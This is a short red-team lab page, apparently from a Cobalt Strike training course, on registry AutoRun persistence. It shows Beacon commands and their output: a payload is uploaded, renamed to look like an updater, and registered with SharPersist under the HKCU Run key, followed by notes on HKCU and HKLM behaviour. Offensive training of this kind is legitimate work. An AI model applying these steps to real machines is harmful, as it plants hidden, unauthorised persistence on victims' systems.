Registry AutoRun

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

[*] INFO: Adding registry persistence
[*] INFO: Command: C:\ProgramData\Updater.exe
[*] INFO: Command Args: /q /n
[*] INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[*] INFO: Registry Value: Updater
[*] INFO: Option: 
[+] SUCCESS: Registry persistence added

Where:

  • -k is the registry key to modify.

  • -v is the name of the registry key to create.

\

As before, you can test this by rebooting the VM.

It's a common misconception that an HKLM autorun will execute the payload as SYSTEM, but this is not the case. An HKCU autorun will only trigger when the owner of the hive logs into the machine. An HKLM autorun will trigger when any user logs into the machine, but it will still run under the context of the user's account.

Last updated